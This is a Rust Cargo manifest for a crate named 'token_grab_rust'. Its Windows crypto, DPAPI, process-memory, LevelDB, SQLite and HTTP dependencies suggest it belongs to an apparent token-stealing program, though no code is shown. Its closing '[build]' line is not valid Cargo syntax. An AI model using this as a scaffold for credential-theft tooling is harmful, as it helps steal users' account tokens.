[package]
name = "token_grab_rust"
version = "0.1.0"
edition = "2021"
authors = ["VullWen", "GoldFire94"]

[dependencies]
reqwest       = { version = "0.12", features = ["json", "rustls-tls", "blocking"] }
tokio         = { version = "1", features = ["full"] }
serde         = { version = "1.0", features = ["derive"] }
serde_json    = "1.0"
regex         = "1.7"
base64        = "0.21"
aes           = "0.8"
aes-gcm       = "0.10"
rand          = "0.8"
rustls        = "0.20"
warp          = "0.3"
sysinfo       = "0.26"
leveldb       = { package = "leveldb", version = "0.8" }
rusqlite      = { version = "0.28", features = ["bundled"] }
dirs          = "5.0"
anyhow        = "1.0"
widestring    = "0.4"
winapi        = { version = "0.3", features = ["dpapi", "wincrypt", "processthreadsapi", "handleapi", "memoryapi", "tlhelp32", "winnt"] }
hex           = "0.4"

[build-dependencies]
cc = "1.0"

[build]
DCMAKE_POLICY_VERSION_MINIMUM=3.5
